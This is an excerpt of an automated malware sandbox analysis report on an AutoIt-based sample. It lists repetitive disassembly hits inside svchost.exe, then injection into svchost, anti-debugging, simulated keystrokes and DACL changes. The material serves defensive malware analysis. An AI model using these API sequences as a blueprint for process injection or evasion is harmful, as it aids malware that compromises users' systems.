          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04500 mov eax, dword ptr fs:[00000030h]4_2_03C04500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6656A mov eax, dword ptr fs:[00000030h]4_2_03B6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6656A mov eax, dword ptr fs:[00000030h]4_2_03B6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6656A mov eax, dword ptr fs:[00000030h]4_2_03B6656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38550 mov eax, dword ptr fs:[00000030h]4_2_03B38550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38550 mov eax, dword ptr fs:[00000030h]4_2_03B38550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B644B0 mov ecx, dword ptr fs:[00000030h]4_2_03B644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]4_2_03BBA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B364AB mov eax, dword ptr fs:[00000030h]4_2_03B364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEA49A mov eax, dword ptr fs:[00000030h]4_2_03BEA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B304E5 mov ecx, dword ptr fs:[00000030h]4_2_03B304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A430 mov eax, dword ptr fs:[00000030h]4_2_03B6A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2E420 mov eax, dword ptr fs:[00000030h]4_2_03B2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2E420 mov eax, dword ptr fs:[00000030h]4_2_03B2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2E420 mov eax, dword ptr fs:[00000030h]4_2_03B2E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2C427 mov eax, dword ptr fs:[00000030h]4_2_03B2C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6420 mov eax, dword ptr fs:[00000030h]4_2_03BB6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B68402 mov eax, dword ptr fs:[00000030h]4_2_03B68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B68402 mov eax, dword ptr fs:[00000030h]4_2_03B68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B68402 mov eax, dword ptr fs:[00000030h]4_2_03B68402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5A470 mov eax, dword ptr fs:[00000030h]4_2_03B5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5A470 mov eax, dword ptr fs:[00000030h]4_2_03B5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5A470 mov eax, dword ptr fs:[00000030h]4_2_03B5A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBC460 mov ecx, dword ptr fs:[00000030h]4_2_03BBC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEA456 mov eax, dword ptr fs:[00000030h]4_2_03BEA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2645D mov eax, dword ptr fs:[00000030h]4_2_03B2645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5245A mov eax, dword ptr fs:[00000030h]4_2_03B5245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E443 mov eax, dword ptr fs:[00000030h]4_2_03B6E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40BBE mov eax, dword ptr fs:[00000030h]4_2_03B40BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40BBE mov eax, dword ptr fs:[00000030h]4_2_03B40BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]4_2_03BE4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]4_2_03BE4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38BF0 mov eax, dword ptr fs:[00000030h]4_2_03B38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38BF0 mov eax, dword ptr fs:[00000030h]4_2_03B38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38BF0 mov eax, dword ptr fs:[00000030h]4_2_03B38BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5EBFC mov eax, dword ptr fs:[00000030h]4_2_03B5EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]4_2_03BBCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]4_2_03BDEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B50BCB mov eax, dword ptr fs:[00000030h]4_2_03B50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B50BCB mov eax, dword ptr fs:[00000030h]4_2_03B50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B50BCB mov eax, dword ptr fs:[00000030h]4_2_03B50BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30BCD mov eax, dword ptr fs:[00000030h]4_2_03B30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30BCD mov eax, dword ptr fs:[00000030h]4_2_03B30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30BCD mov eax, dword ptr fs:[00000030h]4_2_03B30BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5EB20 mov eax, dword ptr fs:[00000030h]4_2_03B5EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5EB20 mov eax, dword ptr fs:[00000030h]4_2_03B5EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF8B28 mov eax, dword ptr fs:[00000030h]4_2_03BF8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF8B28 mov eax, dword ptr fs:[00000030h]4_2_03BF8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C02B57 mov eax, dword ptr fs:[00000030h]4_2_03C02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C02B57 mov eax, dword ptr fs:[00000030h]4_2_03C02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C02B57 mov eax, dword ptr fs:[00000030h]4_2_03C02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C02B57 mov eax, dword ptr fs:[00000030h]4_2_03C02B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAEB1D mov eax, dword ptr fs:[00000030h]4_2_03BAEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04B00 mov eax, dword ptr fs:[00000030h]4_2_03C04B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2CB7E mov eax, dword ptr fs:[00000030h]4_2_03B2CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B28B50 mov eax, dword ptr fs:[00000030h]4_2_03B28B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDEB50 mov eax, dword ptr fs:[00000030h]4_2_03BDEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE4B4B mov eax, dword ptr fs:[00000030h]4_2_03BE4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE4B4B mov eax, dword ptr fs:[00000030h]4_2_03BE4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC6B40 mov eax, dword ptr fs:[00000030h]4_2_03BC6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC6B40 mov eax, dword ptr fs:[00000030h]4_2_03BC6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFAB40 mov eax, dword ptr fs:[00000030h]4_2_03BFAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD8B42 mov eax, dword ptr fs:[00000030h]4_2_03BD8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38AA0 mov eax, dword ptr fs:[00000030h]4_2_03B38AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38AA0 mov eax, dword ptr fs:[00000030h]4_2_03B38AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B86AA4 mov eax, dword ptr fs:[00000030h]4_2_03B86AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B68A90 mov edx, dword ptr fs:[00000030h]4_2_03B68A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3EA80 mov eax, dword ptr fs:[00000030h]4_2_03B3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04A80 mov eax, dword ptr fs:[00000030h]4_2_03C04A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6AAEE mov eax, dword ptr fs:[00000030h]4_2_03B6AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6AAEE mov eax, dword ptr fs:[00000030h]4_2_03B6AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30AD0 mov eax, dword ptr fs:[00000030h]4_2_03B30AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B64AD0 mov eax, dword ptr fs:[00000030h]4_2_03B64AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B64AD0 mov eax, dword ptr fs:[00000030h]4_2_03B64AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B86ACC mov eax, dword ptr fs:[00000030h]4_2_03B86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B86ACC mov eax, dword ptr fs:[00000030h]4_2_03B86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B86ACC mov eax, dword ptr fs:[00000030h]4_2_03B86ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B54A35 mov eax, dword ptr fs:[00000030h]4_2_03B54A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B54A35 mov eax, dword ptr fs:[00000030h]4_2_03B54A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6CA38 mov eax, dword ptr fs:[00000030h]4_2_03B6CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6CA24 mov eax, dword ptr fs:[00000030h]4_2_03B6CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5EA2E mov eax, dword ptr fs:[00000030h]4_2_03B5EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBCA11 mov eax, dword ptr fs:[00000030h]4_2_03BBCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BACA72 mov eax, dword ptr fs:[00000030h]4_2_03BACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BACA72 mov eax, dword ptr fs:[00000030h]4_2_03BACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6CA6F mov eax, dword ptr fs:[00000030h]4_2_03B6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6CA6F mov eax, dword ptr fs:[00000030h]4_2_03B6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6CA6F mov eax, dword ptr fs:[00000030h]4_2_03B6CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDEA60 mov eax, dword ptr fs:[00000030h]4_2_03BDEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36A50 mov eax, dword ptr fs:[00000030h]4_2_03B36A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40A5B mov eax, dword ptr fs:[00000030h]4_2_03B40A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40A5B mov eax, dword ptr fs:[00000030h]4_2_03B40A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB89B3 mov esi, dword ptr fs:[00000030h]4_2_03BB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB89B3 mov eax, dword ptr fs:[00000030h]4_2_03BB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB89B3 mov eax, dword ptr fs:[00000030h]4_2_03BB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B429A0 mov eax, dword ptr fs:[00000030h]4_2_03B429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B309AD mov eax, dword ptr fs:[00000030h]4_2_03B309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B309AD mov eax, dword ptr fs:[00000030h]4_2_03B309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B629F9 mov eax, dword ptr fs:[00000030h]4_2_03B629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B629F9 mov eax, dword ptr fs:[00000030h]4_2_03B629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]4_2_03BBE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]4_2_03B3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]4_2_03B3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]4_2_03B3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]4_2_03B3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]4_2_03B3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]4_2_03B3A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B649D0 mov eax, dword ptr fs:[00000030h]4_2_03B649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]4_2_03BFA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC69C0 mov eax, dword ptr fs:[00000030h]4_2_03BC69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04940 mov eax, dword ptr fs:[00000030h]4_2_03C04940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB892A mov eax, dword ptr fs:[00000030h]4_2_03BB892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC892B mov eax, dword ptr fs:[00000030h]4_2_03BC892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBC912 mov eax, dword ptr fs:[00000030h]4_2_03BBC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B28918 mov eax, dword ptr fs:[00000030h]4_2_03B28918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B28918 mov eax, dword ptr fs:[00000030h]4_2_03B28918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE908 mov eax, dword ptr fs:[00000030h]4_2_03BAE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE908 mov eax, dword ptr fs:[00000030h]4_2_03BAE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD4978 mov eax, dword ptr fs:[00000030h]4_2_03BD4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD4978 mov eax, dword ptr fs:[00000030h]4_2_03BD4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBC97C mov eax, dword ptr fs:[00000030h]4_2_03BBC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B56962 mov eax, dword ptr fs:[00000030h]4_2_03B56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B56962 mov eax, dword ptr fs:[00000030h]4_2_03B56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B56962 mov eax, dword ptr fs:[00000030h]4_2_03B56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B7096E mov eax, dword ptr fs:[00000030h]4_2_03B7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B7096E mov edx, dword ptr fs:[00000030h]4_2_03B7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B7096E mov eax, dword ptr fs:[00000030h]4_2_03B7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB0946 mov eax, dword ptr fs:[00000030h]4_2_03BB0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C008C0 mov eax, dword ptr fs:[00000030h]4_2_03C008C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBC89D mov eax, dword ptr fs:[00000030h]4_2_03BBC89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30887 mov eax, dword ptr fs:[00000030h]4_2_03B30887
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]4_2_03B6C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]4_2_03B6C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]4_2_03BFA8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]4_2_03B5E8C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B52835 mov eax, dword ptr fs:[00000030h]4_2_03B52835
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F91361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02F91361
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F94C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_02F94C7B

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3053008Jump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004587B1 LogonUserW,0_2_004587B1
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LiuUGJK9vH.exe"Jump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
          Source: LiuUGJK9vH.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: LiuUGJK9vH.exeBinary or memory string: Shell_TrayWnd
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
